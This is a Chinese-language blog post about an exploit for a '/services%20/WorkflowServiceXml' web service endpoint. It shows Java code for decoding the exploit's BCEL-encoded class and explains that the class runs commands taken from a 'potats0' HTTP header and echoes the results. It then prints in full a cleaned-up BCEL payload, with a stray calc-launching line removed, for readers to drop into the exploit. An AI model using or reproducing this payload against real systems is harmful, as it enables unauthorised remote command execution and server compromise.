0x01

在宽字节公众号，看到了关于/services%20/WorkflowServiceXml的分析文章，膜拜师傅，发现师傅的exp打了之后会弹计算器，估计是忘删了把，每发一次包就执行一次计算器还是有点难受的，针对这边文章做个记录吧，原理分析后面有空再补充，技术细节公众号已经写得比较详细了tql。

0x02

exp在宽字节星球有，我也没加，好穷，还是借别人的，这里不放了，需要的去星球取吧，肯定有好多好用的东西，不介意师傅们分享给我。
测试过程中发现了好多calc进程，怀疑是payload引起的。

image.png

直接对师傅写的执行命令的类查看，就是bcel编码的那一串，直接解码即可

            byte[] bytess = Utility.decode("$$BCEL$$...", true);
            FileOutputStream foss = new FileOutputStream(new File("C:\\Users\\xxx.class"));
            foss.write(bytess);

把解码得到的class再idea中打开，一来就感受到了大师傅的亲切问候fuckyou

image.png

上面代码的意思就是获取response，然后把执行命令的结果写到响应里，命令从header中potats0读取，造成弹计算器就是第一行的Runtime造成的，将起删掉，重新编译还原成bcel即可如下，使用方法不变，替换掉之前的bcel即可。

$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$ebw$d3d$Y$ffem$97$y$Llt$M$Wn$O$V$e8$80m$m$de$d8$Q$99$h$T$b0$h$97$ce$n$X$c5$y$7bY$c3$da$a4$q$e96$s$8a$X$bc$8b$e2$5dD$fd$e6$e1$f0M$bf$U$8e$i$3d$9c$a3$l$d4$3fJ$fc$bdm7$d7$b5$80$e9$e9$93$bc$cf$fb$dc$7f$cf$fb$q$7f$ff$f3$cbo$A$k$c5$P$3a$g$f0$9c$8e$q$86$q$Z$d6pP$c7$n$i$d6pDEJ$87$8a$R$V$cf$eb$Y$c5Q$v$f9$82$e4$i$d3p$5c$deO$e88$89$X$ryI$c3$v$V$_k$b0t$c41$a6$c1V1$aeA$a88$adc$CiI$i$jg0$a9$a3$N$Z$NYyw$r$f1$q$c9i8$ab$c2$d7$f1$m$C$V$a1$82$fa$5d$8e$eb$84$bb$VD$S$j$a3$K$a2$fd$de$b8P$d0$94t$5c1$9c$cf$8e$J$7f$c4$g$cb$90$TOz$b6$95$Z$b5$7cG$ae$e7$98$a1$9d$L$3c$7bR$84$94$9f$ec$cfX$b3$b3$K$96$r$cfXSVw$c6r$t$ba$c9$K$82$5e$KN$88$b0$3f$ef$fb$c2$N$8f$88$b3y$R$84C$KV$z$Q$f4$c5$e9$8c$b0$c3$ee$n$R$a6$bdqj$y$b5$x$c4e$A$ffI$l$i$3bCaJ$v$a7$V$985$cc$M$3a$o$p$adh$be$Ir$9e$h0V$9d$n$i$f5$9dP$f8t$adL$xh$$$e99$5ew$89$dd$5b$92$d9$t$ac$f1$a2L$c4$ce$8eW$baM$85$be$e3NH$b7$81$82$96$d2F$3et2$dd$v$dbr$dd$a2$85$d8$94$e5o$df$ae$a0u$81$da$de$Z$5b$e4B$c7s$b9$l$N$d3$O$95$h$92$c2$f62$de$c49$b2$96$a4B$cb$9e$i$b2r$c5$a2$S$U$b6$83$8a$3c$9bA$c5$U$b1$s$c0D$97$a01$be$94$97$f7m1$e8$c8$e2$he$T$5d$d2$93$81$N$d8$a8b$da$c0$M$ce$Z$98$c5$x$K6$d9$5e$b6$cb$b6$f2v$da$ebrE8$ed$f9$93$5d$Z$t$I$85$db5b$e7R$f3$b8$a98o$e0U$bcF$e8$aa$60b$x$yB$d3$c0$F$bc$ce$ea$zF$83$n$hx$Do$gx$L$X$N$bc$8d$8b$d4$3d5W$ffA$cbfY$N$bc$83w$99$95$81$f7$f0$be$81$P$f0$nK1$8f$LA$afDDA$o$e7M$L_$8c$b7$8f$9dk$cfy$a1$V$G$5e$7b$cd$cb$c0G$b8T2V$C$b0$o$c2$Sp$K$d4$92$8dm$cc$b4$K$3c$V$l$h$f8$E$97$N$7c$8a$cfT$7cn$e0$L$7c$v$cb$fa$95$82$ba$93$7d$G$be$c67$G$ae$e0$5b$DW$f1$9d$C$b0$Fj$60l$e0$7bl$a4$a728$K$da$ee$d6$e4$KV$de$a5q$xb$lI$fbL$88mR$3e$Qs$eb$e5$89$8e$e4b$vvS$ab$84$d0sC1$T$W$e1Jz$a5j$98$V$e2$L$b6$a4N$cd$NV3$c3$87$oG$c1$86D$f5A$a8$b2$d8$5bB$60$$$bf$3d5tNT$e9t$dck$M$d4$3b$ee$947$c9n$df$99$a8$3e$ff$t$aaY$j$b5$a6$84$skRJ$a3$a5$ba$M$f2$IR$m$95$cf$J$df$$I5s$3d$m$b8$60$eb$95$R$e9$bcO$fe$8b$t$cf$92$40$84$7d$b6$z$82$c0$v$8e$cah$e2$b8$9c$af$RZV$b0$b1F25$p$8fM$cb$83$40$84jy$l$9dk$e3$o$f7H$de$N$9dly$d0$cd$_Z$x$f2$z$b3$e5$i$S3$c2$e6$88$b8OV$87$7cO$a6$d0$5b$e1$a9$cc$e4q$a5$a7$fdn$$$lRSXY6$f4$9c7$k$e1$F$hToK$d4$dc$909$Y$f9$40$M$88$8c$93$z$j$f9$7b$84$b4h$d6$aai$x$Yf$9f$X$df$5d$c7$99$93$5b$5cT$k$8c$f9$99$dd$94$e3CX$9c$b5$p$bee$L$ac$c7$c3$7c$cf$ca$8b$D$5d$8eO$d2M$40$dd$g$d4$a3$91$dc$bf6$df$80r$Tu$FD$e2$d1$Cb$c9$z$f1$fa$c8$afP$L$d0$86$b6$w$7cj$u$40$l$ee$y$a0$b1$A$p$be$a4$80$a5$3dQ3J$c9$s3JnsO$cc$8cq3$be$ac$ac$d4So$d6$9b$b1$b2$dem$c4$7bTS$8d$b7$U$b0$5c$9a$88$b7F$vu$y$S_$91$92$a2$9a$a9u$92$d1$40$c6$caTQ$7cEO$c3$z$b4$j$bb$J$d3$a4$fe$aa$CV$df$c0$9a$f8$da$C$d6$f5$e8$a6j$ea$F$3cp$F$8d$f2$de$7e$N$b1$f8z$da$bd$G$z$b9$a5$80$87$7efbQ$dc$c6$ef$7c$e9G$90$60j$H$f8$ed$A$Y$e46$a1$99$bf$d5X$c6$C$c4$b1$D$z$d8$89$e5$e8C$x$Oc$F$y$acD$9a_$N$e7a$e22V$e1$3a$roc$j$z$ad$c1$lX$8b$3f$d1$8e$OZ$9a$a5$adf$fc$84$cd$d8B_$ab$f1$p$b6$a2$Tu$b4y$V$5d$e8$a6$d7$j$b8$84m$d8N$8f$7d$7c$7f$3cB$5e$8c$k$3c$f2$3bYn$L$a7$f8$85$f4$Y$bft$cec$A$8f$93$a7$d1$df6$3c$81$t$J$d1uF$b1$T$3d$d0$e93$8a$5e$ec$a2$P$c2$83$a7$b0$9b$f7$a7$f9w$Q$bd$83$5bhT$b1GE$9f$8agT$f4$ab$Y$uR$3e$ef$z$d2A$V$cfB$e1$ea$O$f5$ff$87h$5dq5x$87$91Rk$8f$q$fb$a2T$ddO$87u8$f0$_$a7$i$p$ae$d9$J$A$A

参考链接

https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw